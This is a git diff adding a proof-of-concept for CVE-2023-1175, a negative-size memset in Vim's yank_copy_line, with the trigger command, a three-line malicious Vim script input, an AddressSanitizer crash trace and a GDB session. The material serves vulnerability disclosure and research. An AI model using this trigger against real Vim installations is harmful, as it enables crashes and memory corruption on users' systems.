diff --git a/cve/vim/2023/CVE-2023-1175/README.md b/cve/vim/2023/CVE-2023-1175/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..eba25fc4197ea6a033ac3c0eb05bdd42a9e225c2
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1175/README.md
@@ -0,0 +1,134 @@
+## Description
+Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468
+## vim version
+```bash
+git log
+commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD)
+```
+## POC
+```bash
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
+=================================================================
+==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1)
+ #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
+ #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468
+ #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+ #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+ #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+ #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+ #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+ #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+ #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+ #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+ #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+ #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+ #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+ #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+ #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+ #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+ #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
+ #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
+ #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
+ #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d)
+
+0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272)
+allocated by thread T0 here:
+ #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
+ #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246
+ #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151
+ #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464
+ #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+ #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+ #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+ #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+ #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+ #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+ #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+ #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+ #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+ #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+ #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+ #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+ #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+ #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+ #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
+ #23 0x555556ac6f8f in main 
/home/fuzz/vim/src/main.c:433 + #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 + +SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset +==1962298==ABORTING +``` +[poc_nsp01_s.dat](poc_nsp01_s.dat) +## GDB +```bash +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! + +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468 +1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x00005555562c5854 yank_copy_line+883 je 0x5555562c585e + 0x00005555562c5856 yank_copy_line+885 mov %rdx,%rdi + 0x00005555562c5859 yank_copy_line+888 callq 0x555555696b30 <__asan_report_store8@plt> + 0x00005555562c585e yank_copy_line+893 mov -0x18(%rbp),%rdx + 0x00005555562c5862 yank_copy_line+897 mov %rdx,(%rax) +!0x00005555562c5865 yank_copy_line+900 mov -0x28(%rbp),%rax + 0x00005555562c5869 yank_copy_line+904 mov %rax,%rdx + 0x00005555562c586c yank_copy_line+907 mov %rdx,%rax + 0x00005555562c586f yank_copy_line+910 shr $0x3,%rax + 0x00005555562c5873 yank_copy_line+914 add $0x7fff8000,%rax +─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] break at 
0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time +─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + rax 0x0000602000007230 rbx 0x0000555556d935e0 rcx 0x0000000000000000 rdx 0x0000602000007250 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007fffffffbb00 rsp 0x00007fffffffbac0 + r8 0x00007ffff7fb8000 r9 0x0000000000000002 r10 0x0000602000007240 r11 0x00000000000000e0 r12 0x00007fffffffbd30 r13 0x00000ffffffff772 r14 0x00007fffffffbb90 r15 0x0000555556d86b60 + rip 0x00005555562c5865 eflags [ PF ZF IF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1463 bd->endspaces = 0; + 1464 if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1)) + 1465 == NULL) + 1466 return FAIL; + 1467 y_current->y_array[y_idx] = pnew; +!1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); + 1469 pnew += bd->startspaces; + 1470 
mch_memmove(pnew, bd->textstart, (size_t)bd->textlen); + 1471 pnew += bd->textlen; + 1472 vim_memset(pnew, ' ', (size_t)bd->endspaces); +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290 +[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742 +[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754 +[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123 +[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960 +[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887 +[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850 +[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768 +[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0 +loc pnew = 0x602000007250 "\276\276": 190 '\276' +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +>>> p 
bd->startspaces
+$2 = -1
+>>>
+```
+## Impact
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
diff --git a/cve/vim/2023/CVE-2023-1175/poc_nsp01_s.dat b/cve/vim/2023/CVE-2023-1175/poc_nsp01_s.dat
new file mode 100644
index 0000000000000000000000000000000000000000..ee7f2853ebd3226dcd5f905c35dd02fab51ee75b
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1175/poc_nsp01_s.dat
@@ -0,0 +1,3 @@
+se ve=all
+sil0norm0a0
+sil!norm0o000000k